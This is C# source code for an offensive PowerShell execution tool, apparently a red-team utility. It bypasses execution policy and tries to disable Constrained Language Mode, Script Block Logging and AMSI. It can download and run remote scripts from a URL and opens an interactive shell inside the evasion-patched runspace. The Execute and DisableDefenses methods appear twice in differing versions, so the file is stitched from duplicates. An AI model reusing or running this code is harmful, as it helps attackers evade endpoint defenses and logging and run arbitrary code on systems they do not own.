private static string Execute(string scriptPath, string command)
{
string output = "";
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.ApartmentState = System.Threading.ApartmentState.STA;
state.AuthorizationManager = null; // Bypasses PowerShell execution policy
state.ThreadOptions = PSThreadOptions.UseCurrentThread;
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.ApartmentState = System.Threading.ApartmentState.STA;
runspace.ThreadOptions = PSThreadOptions.UseCurrentThread;
runspace.Open();
using (var ps = PowerShell.Create())
{
ps.Runspace = runspace;
if (!DisableDefenses(ps, host))
{
Info("[-] Could not disable all of the Powershell defenses.");
if (!ProgramOptions.Force)
{
Info("[-] Bailing out...");
}
}
string scriptContents = "";
if (scriptPath.Length > 0)
{
scriptContents = GetFileContents(scriptPath);
Info($"PS> . '{scriptPath}'");
output += ExecuteCommand(scriptContents, ps, host, false, false, false);
scriptContents = "";
scriptPath = "";
ProgramOptions.ScriptPath = "";
}
output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
command = "";
if (!ProgramOptions.Nocleanup && CleanupNeeded)
{
DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
}
System.GC.Collect();
}
runspace.Close();
}
return(output.Trim());
}
private static void Parashell()
{
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypasses PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (var ps = PowerShell.Create())
{
ps.Runspace = runspace;
if (!DisableDefenses(ps, host))
{
Info("[-] Could not disable all of the Powershell defenses.");
if (!ProgramOptions.Force)
{
Info("[-] Bailing out...");
return;
}
}
string input;
while (true)
{
string pwd = ExecuteCommand("(Resolve-Path .\\).Path", ps, host, true, true).Trim();
string prompt = $"{GLOBAL_PROMPT_PREFIX} {pwd}> ";
input = Input(prompt);
string output = ExecuteCommand(input, ps, host, true);
Console.WriteLine(output);
if (input == null || input.Length == 0 ||
String.Equals(input, "exit", StringComparison.CurrentCultureIgnoreCase) ||
String.Equals(input, "quit", StringComparison.CurrentCultureIgnoreCase))
{
break;
}
input = "";
}
if (!ProgramOptions.Nocleanup && CleanupNeeded)
{
DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
}
}
runspace.Close();
}
}
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
bool ret = true;
ret &= DisableClm.DoDisable(rs);
string l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true);
Info($"[.] Language Mode: {l}");
if (ret && String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
Info("[+] Constrained Language Mode Disabled.");
}
else
{
Info("[-] Constrained Language Mode not disabled.");
}
if ((ret &= DisableScriptLogging(rs)))
{
Info("[+] Script Block Logging Disabled.");
}
else
{
Info("[-] Script Block Logging not disabled.");
}
if ((ret &= DisableAmsi(rs)))
{
Info("[+] AMSI Disabled.");
}
else
{
Info("[-] AMSI not disabled.");
}
return(ret);
}
static void Main(string[] args)
{
if ((args.Length >= 1) && (String.Equals(args[0], "--help", StringComparison.CurrentCultureIgnoreCase) ||
String.Equals(args[0], "/h", StringComparison.CurrentCultureIgnoreCase) ||
String.Equals(args[0], "/?", StringComparison.CurrentCultureIgnoreCase) ||
String.Equals(args[0], "-h", StringComparison.CurrentCultureIgnoreCase)))
{
Usage();
return;
}
try
{
ProgramOptions = ParseOptions(args);
}
catch (ArgumentException e)
{
Console.WriteLine($"[-] Cannot parse arguments: {e.Message.ToString()}");
Usage();
return;
}
if (ProgramOptions.Verbose)
{
PrintBanner();
}
if (ProgramOptions.ScriptPath.Length > 0)
{
Info($"[.] Will load script file: '{ProgramOptions.ScriptPath}'");
}
else
{
//Info($"[-] It looks like no script path was given.");
}
if (ProgramOptions.XorKey != 0)
{
Info($"[.] Using decoding key: {ProgramOptions.XorKey}");
}
try
{
AppDomain dom = AppDomain.CreateDomain("sandbox");
if (ProgramOptions.Parashell)
{
Console.CancelKeyPress += (object sender, ConsoleCancelEventArgs e) =>
{
if (e.SpecialKey == ConsoleSpecialKey.ControlC)
{
e.Cancel = true;
Console.WriteLine("^C");
}
};
Parashell();
}
else
{
string output = Execute(ProgramOptions.ScriptPath, ProgramOptions.Command);
if (output.Length > 0)
{
Console.WriteLine("\n" + output);
}
}
GC.Collect();
GC.WaitForPendingFinalizers();
GC.Collect();
if (!ProgramOptions.Nocleanup && CleanupNeeded)
{
DisableClm.Cleanup(null, null, ProgramOptions.Verbose);
}
}
catch (Exception e)
{
Console.WriteLine($"[!] That's embarassing. Unhandled exception occured:\n{e}");
}
}
private static string Execute(string scriptPath, string command)
{
string output = "";
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.ApartmentState = System.Threading.ApartmentState.STA;
state.AuthorizationManager = null; // Bypasses PowerShell execution policy
state.ThreadOptions = PSThreadOptions.UseCurrentThread;
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.ApartmentState = System.Threading.ApartmentState.STA;
runspace.ThreadOptions = PSThreadOptions.UseCurrentThread;
runspace.Open();
using (var ps = PowerShell.Create())
{
ps.Runspace = runspace;
if (!DisableDefenses(ps, host))
{
Info("[-] Could not disable all of the Powershell defenses.");
if (!ProgramOptions.Force)
{
Info("[-] Bailing out...");
}
}
if (scriptPath.Length > 0)
{
bool success = true;
string scriptContents = "";
bool silent = false;
try
{
if (scriptPath.StartsWith("http://") || scriptPath.StartsWith("https://"))
{
using (var wc = new System.Net.WebClient())
{
scriptContents = wc.DownloadString(scriptPath);
}
silent = true;
Info($"Executing downloaded script file: {scriptPath}");
}
else
{
if (!File.Exists(scriptPath))
{
throw new Exception($"Script file does not exist.Will not load it: '{scriptPath}'");
}
scriptContents = GetFileContents(scriptPath);
Info($"PS> . '{scriptPath}'");
}
}
catch (Exception e)
{
Info($"Could not fetch script file/URL contents. Exception: {e}");
success = false;
}
if (success && scriptContents.Length > 0)
{
output += ExecuteCommand(scriptContents, ps, host, false, silent, false);
}
scriptContents = "";
scriptPath = "";
ProgramOptions.ScriptPath = "";
}
output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
command = "";
if (!ProgramOptions.Nocleanup && CleanupNeeded)
{
DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
}
System.GC.Collect();
}
runspace.Close();
}
return(output.Trim());
}
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
bool ret = true;
string l = ExecuteCommand("'{0}.{1}' -f $PSVersionTable.PSVersion.Major, $PSVersionTable.PSVersion.Minor", rs, host, true, true).Trim();
float psversion = 5;
try
{
System.Globalization.CultureInfo customCulture = (System.Globalization.CultureInfo)System.Threading.Thread.CurrentThread.CurrentCulture.Clone();
customCulture.NumberFormat.NumberDecimalSeparator = ".";
System.Threading.Thread.CurrentThread.CurrentCulture = customCulture;
psversion = float.Parse(l, System.Globalization.CultureInfo.InvariantCulture);
}
catch (FormatException e)
{
Info($"[-] Could not obtain Powershell's version. Assuming 5.0 (exception: {e}");
}
if (psversion < 5.0 && !ProgramOptions.Force)
{
Info("[+] Powershell version is below 5, so AMSI, CLM, SBL are not available anyway :-)");
Info("Skipping bypass procedures...");
return(ret);
}
else
{
Info($"[.] Powershell's version: {psversion}");
}
l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
Info($"[.] Language Mode: {l}");
if (!String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
DisableClm.DoDisable(rs, host, ProgramOptions.Verbose);
CleanupNeeded = true;
l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
Info($"[.] Language Mode after attempting to disable CLM: {l}");
if (String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
Info("[+] Constrained Language Mode Disabled.");
ret &= true;
}
else
{
Info("[-] Constrained Language Mode not disabled.");
ret &= false;
}
}
else
{
Info("[+] No need to disable Constrained Language Mode. Already in FullLanguage.");
}
if ((ret &= DisableScriptLogging(rs)))
{
Info("[+] Script Block Logging Disabled.");
}
else
{
Info("[-] Script Block Logging not disabled.");
}
if ((ret &= DisableAmsi(rs)))
{
Info("[+] AMSI Disabled.");
}
else
{
Info("[-] AMSI not disabled.");
}
Info("");
return(ret);
}